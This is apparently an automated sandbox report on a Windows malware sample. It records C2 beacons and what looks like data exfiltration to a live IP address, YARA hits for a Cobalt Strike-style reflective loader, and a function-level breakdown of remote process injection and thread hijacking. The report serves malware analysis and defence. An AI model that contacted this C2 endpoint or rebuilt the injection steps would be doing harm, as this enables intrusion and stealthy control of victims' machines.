Jan 2, 2025 09:29:56.827496052 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49994	47.76.199.218	80	6404	C:\Windows\SysWOW64\BackgroundTransferHost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:30:02.461817026 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:30:02.466649055 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49995	47.76.199.218	80	6404	C:\Windows\SysWOW64\BackgroundTransferHost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:30:07.869333029 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:30:07.874317884 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49996	47.76.199.218	80	6404	C:\Windows\SysWOW64\BackgroundTransferHost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:30:14.622060061 CET	659	OUT	GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjBW1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZsdrjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PXFHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8= HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 508
Jan 2, 2025 09:30:14.627007961 CET	508	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 36 33 35 26 64 61 74 61 3d 65 6e Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjB*W1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49997	47.76.199.218	80	5568	C:\Windows\SysWOW64\raserver.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:30:20.098669052 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:30:20.103477955 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 38 31 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49998	47.76.199.218	80	5568	C:\Windows\SysWOW64\raserver.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:30:25.493458986 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:30:25.498305082 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 38 31 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49999	47.76.199.218	80	5568	C:\Windows\SysWOW64\raserver.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:30:30.901451111 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:30:30.908499956 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 38 31 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618

Target ID:	0
Start time:	03:28:24
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\1731043030539.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\1731043030539.exe"
Imagebase:	0x7ff6e5340000
File size:	1'088'000 bytes
MD5 hash:	0FFA0039C3E96E4B95293B09DB72CD85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.2033463108.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:28:25
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:28:25
Start date:	02/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	03:28:25
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xde0000
File size:	149'504 bytes
MD5 hash:	EBC29AA32C57A54018089CFC9CACAFE8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000003.2037787029.0000000000B10000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:28:55
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\fontview.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\fontview.exe
Imagebase:	0xe50000
File size:	113'152 bytes
MD5 hash:	8324ECE6961ADBE6120CCE9E0BC05F76
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000006.00000003.2336009620.0000000000820000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:29:23
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\resmon.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\resmon.exe
Imagebase:	0x2a0000
File size:	109'056 bytes
MD5 hash:	29C52C15D2D68A4BBE9A36701D31100E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000008.00000003.2618083519.0000000002300000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000008.00000002.3295072698.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:29:49
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\BackgroundTransferHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\BackgroundTransferHost.exe
Imagebase:	0x910000
File size:	34'304 bytes
MD5 hash:	0E57CCE96CEE6080C8CB279836EB712C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000009.00000003.2883861414.00000000006B0000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000009.00000002.3294959038.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:30:18
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\raserver.exe
Imagebase:	0xaa0000
File size:	107'520 bytes
MD5 hash:	D1053D114847677185F248FF98C3F255
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000A.00000002.3294823523.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000A.00000003.3172524363.0000000002AC0000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	59.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	70.8%
Total number of Nodes:	219
Total number of Limit Nodes:	14

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF6E53411CB Relevance: 96.8, APIs: 52, Strings: 3, Instructions: 571
threadstringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6E53411F0
OpenProcessToken.ADVAPI32 ref: 00007FF6E5341201
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6E534121C
AdjustTokenPrivileges.KERNELBASE ref: 00007FF6E5341259
CloseHandle.KERNELBASE ref: 00007FF6E5341267
wsprintfW.USER32 ref: 00007FF6E5341298
lstrlenW.KERNEL32 ref: 00007FF6E53412AF
OpenProcess.KERNEL32 ref: 00007FF6E53412D5
CloseHandle.KERNEL32 ref: 00007FF6E5341314
wsprintfW.USER32 ref: 00007FF6E5341334
wsprintfW.USER32 ref: 00007FF6E5341382
wsprintfW.USER32 ref: 00007FF6E53413D5
wsprintfW.USER32 ref: 00007FF6E5341423
OpenProcess.KERNEL32 ref: 00007FF6E5341445
InitializeProcThreadAttributeList.KERNEL32 ref: 00007FF6E5341477
GlobalAlloc.KERNEL32 ref: 00007FF6E5341482
InitializeProcThreadAttributeList.KERNEL32 ref: 00007FF6E53414A9
UpdateProcThreadAttribute.KERNEL32 ref: 00007FF6E53414D2
lstrcpyW.KERNEL32 ref: 00007FF6E53414EA
CreateProcessW.KERNELBASE ref: 00007FF6E5341543
CloseHandle.KERNELBASE ref: 00007FF6E53415CE
wsprintfW.USER32 ref: 00007FF6E5341609

Part of subcall function 00007FF6E534224E: GetCurrentProcessId.KERNEL32 ref: 00007FF6E534225E
Part of subcall function 00007FF6E534224E: wsprintfW.USER32 ref: 00007FF6E5342276
Part of subcall function 00007FF6E534224E: WriteFile.KERNELBASE ref: 00007FF6E53422B4

wsprintfW.USER32 ref: 00007FF6E5341641
OpenProcess.KERNEL32 ref: 00007FF6E534168C
wsprintfW.USER32 ref: 00007FF6E5341ADC
OpenProcess.KERNEL32 ref: 00007FF6E5341AFC
CloseHandle.KERNEL32 ref: 00007FF6E53416F6

Part of subcall function 00007FF6E5341112: Sleep.KERNEL32 ref: 00007FF6E534114C
Part of subcall function 00007FF6E5341112: VirtualAllocEx.KERNEL32 ref: 00007FF6E5341168
Part of subcall function 00007FF6E5341112: wsprintfW.USER32 ref: 00007FF6E5341184
Part of subcall function 00007FF6E5341112: VirtualFreeEx.KERNEL32 ref: 00007FF6E53411AA

wsprintfW.USER32 ref: 00007FF6E534172E
wsprintfW.USER32 ref: 00007FF6E534175F
OpenProcess.KERNEL32 ref: 00007FF6E534179C
CloseHandle.KERNEL32 ref: 00007FF6E5341806
wsprintfW.USER32 ref: 00007FF6E534183B
wsprintfW.USER32 ref: 00007FF6E5341881
PathFindFileNameW.SHLWAPI ref: 00007FF6E53418A9
InitializeProcThreadAttributeList.KERNEL32 ref: 00007FF6E5341901
GlobalAlloc.KERNEL32 ref: 00007FF6E534190C
InitializeProcThreadAttributeList.KERNEL32 ref: 00007FF6E5341933
UpdateProcThreadAttribute.KERNEL32 ref: 00007FF6E534195C
lstrcpyW.KERNEL32 ref: 00007FF6E5341974
CreateProcessW.KERNEL32 ref: 00007FF6E53419CD
CloseHandle.KERNEL32 ref: 00007FF6E5341A6E
CloseHandle.KERNEL32 ref: 00007FF6E5341A75
DeleteProcThreadAttributeList.KERNEL32 ref: 00007FF6E5341A7A
GlobalFree.KERNEL32 ref: 00007FF6E5341A83
CloseHandle.KERNEL32 ref: 00007FF6E5341A91
wsprintfW.USER32 ref: 00007FF6E5341AAC

Part of subcall function 00007FF6E5342318: VirtualAllocEx.KERNELBASE ref: 00007FF6E53423D1
Part of subcall function 00007FF6E5342318: WriteProcessMemory.KERNELBASE ref: 00007FF6E5342457
Part of subcall function 00007FF6E5342318: WriteProcessMemory.KERNELBASE ref: 00007FF6E5342480
Part of subcall function 00007FF6E5342318: WriteProcessMemory.KERNELBASE ref: 00007FF6E53424A9
Part of subcall function 00007FF6E5342318: WriteProcessMemory.KERNELBASE ref: 00007FF6E53424D6

wsprintfW.USER32 ref: 00007FF6E5341B87

Part of subcall function 00007FF6E5342318: VirtualProtectEx.KERNELBASE ref: 00007FF6E534250F
Part of subcall function 00007FF6E5342318: CreateRemoteThread.KERNEL32 ref: 00007FF6E534256E
Part of subcall function 00007FF6E5342318: WaitForSingleObject.KERNEL32 ref: 00007FF6E5342588
Part of subcall function 00007FF6E5342318: CloseHandle.KERNEL32 ref: 00007FF6E5342591
Part of subcall function 00007FF6E5342318: VirtualFreeEx.KERNELBASE ref: 00007FF6E53425BE
Part of subcall function 00007FF6E5342318: wsprintfW.USER32 ref: 00007FF6E53425E5

CloseHandle.KERNEL32 ref: 00007FF6E5341B65

Strings

SeDebugPrivilege, xrefs: 00007FF6E5341213
C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, xrefs: 00007FF6E53414D8, 00007FF6E5341962
C:\Windows\System32\services.exe, xrefs: 00007FF6E5341897

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: wsprintf$Process$CloseHandle$Thread$AttributeProc$Open$ListVirtualWrite$AllocInitializeMemory$CreateFreeGlobal$CurrentFileTokenUpdatelstrcpy$AdjustDeleteFindLookupNameObjectPathPrivilegePrivilegesProtectRemoteSingleSleepValueWaitlstrlen
String ID: C:\Windows\System32\services.exe$C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p$SeDebugPrivilege
API String ID: 25706242-1126785914
Opcode ID: 671d346e829b02091f3ba546a5bde1e68ac5204a7dcab161fa5497929df3df4b
Instruction ID: 977f6a8fcc7327c14d4c6c17a358f28533eb6a03858f8a6f1b81c784ec270135
Opcode Fuzzy Hash: 671d346e829b02091f3ba546a5bde1e68ac5204a7dcab161fa5497929df3df4b
Instruction Fuzzy Hash: 20427332A18B4686EB609F25E4643AA73A1FB95F84F404035D94DC3B95EF3ED90BCB05

Function 00007FF6E5342318 Relevance: 25.7, APIs: 17, Instructions: 226
threadinjectionsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF6E53423D1
WriteProcessMemory.KERNELBASE ref: 00007FF6E5342457
WriteProcessMemory.KERNELBASE ref: 00007FF6E5342480
WriteProcessMemory.KERNELBASE ref: 00007FF6E53424A9
WriteProcessMemory.KERNELBASE ref: 00007FF6E53424D6
VirtualProtectEx.KERNELBASE ref: 00007FF6E534250F
CreateRemoteThread.KERNEL32 ref: 00007FF6E534256E
WaitForSingleObject.KERNEL32 ref: 00007FF6E5342588
CloseHandle.KERNEL32 ref: 00007FF6E5342591
VirtualFreeEx.KERNELBASE ref: 00007FF6E53425BE
wsprintfW.USER32 ref: 00007FF6E53425E5
Wow64GetThreadContext.KERNEL32 ref: 00007FF6E5342639
Wow64SetThreadContext.KERNEL32 ref: 00007FF6E5342664
GetThreadContext.KERNEL32 ref: 00007FF6E5342690
SetThreadContext.KERNELBASE ref: 00007FF6E53426B8
ResumeThread.KERNELBASE ref: 00007FF6E53426E4
WaitForSingleObject.KERNEL32 ref: 00007FF6E53426F2

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: Thread$ContextMemoryProcessWrite$Virtual$ObjectSingleWaitWow64$AllocCloseCreateFreeHandleProtectRemoteResumewsprintf
String ID:
API String ID: 200714770-0
Opcode ID: c3ffab3674fc72676a378aba038bba3a553961f6cb10387b2827a9e3e31fd90d
Instruction ID: 5afcb4a790202bc80ccdb9f5a1e0fba0d645d8ad51b6278c2206eebf19221823
Opcode Fuzzy Hash: c3ffab3674fc72676a378aba038bba3a553961f6cb10387b2827a9e3e31fd90d
Instruction Fuzzy Hash: 71A17062618B8182E7749F11A86036AB7A5FB94FC0F404035EE8DD7B94EF3ED84AD705

Function 00007FF6E5342700 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65
injectionmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6E5341040), ref: 00007FF6E5342711

Part of subcall function 00007FF6E5341CE0: CloseHandle.KERNELBASE ref: 00007FF6E5341D41

OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6E5341040), ref: 00007FF6E534273B
VirtualAllocEx.KERNELBASE ref: 00007FF6E5342766
WriteProcessMemory.KERNELBASE ref: 00007FF6E5342790
VirtualProtectEx.KERNELBASE ref: 00007FF6E53427B6
CreateRemoteThread.KERNELBASE ref: 00007FF6E53427E9
CloseHandle.KERNEL32 ref: 00007FF6E53427F2
CloseHandle.KERNEL32 ref: 00007FF6E53427FB

Strings

C:\Users\user\Desktop\1731043030539.exe, xrefs: 00007FF6E534270A, 00007FF6E534277D

Memory Dump Source

Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true

Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd

Yara matches

Similarity

API ID: CloseHandle$ProcessVirtual$AllocCreateMemoryOpenProtectRemoteThreadWritelstrcpy
String ID: C:\Users\user\Desktop\1731043030539.exe
API String ID: 4237685522-894419093
Opcode ID: c3060783595219b04aba6df98c4fe00ecae84a5979ac2a9fc1d9e616434945ac
Instruction ID: 668bde9955b244de6cc4d4401d12e56a97bf5bb4e6002a41f5e957496dd637dc
Opcode Fuzzy Hash: c3060783595219b04aba6df98c4fe00ecae84a5979ac2a9fc1d9e616434945ac
Instruction Fuzzy Hash: 5B218E22B1861182FB608F12E8247AA67A5EB85FC4F044134DD4DC7B94EF3ED90BC709

Function 00007FF6E5341BD1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpiW.KERNEL32 ref: 00007FF6E5341BEE
OpenProcess.KERNEL32 ref: 00007FF6E5341C03
IsWow64Process.KERNEL32 ref: 00007FF6E5341C1C
CloseHandle.KERNEL32 ref: 00007FF6E5341C2A
lstrcmpW.KERNEL32 ref: 00007FF6E5341C5E

Strings

svchost.exe, xrefs: 00007FF6E5341BE7

Memory Dump Source

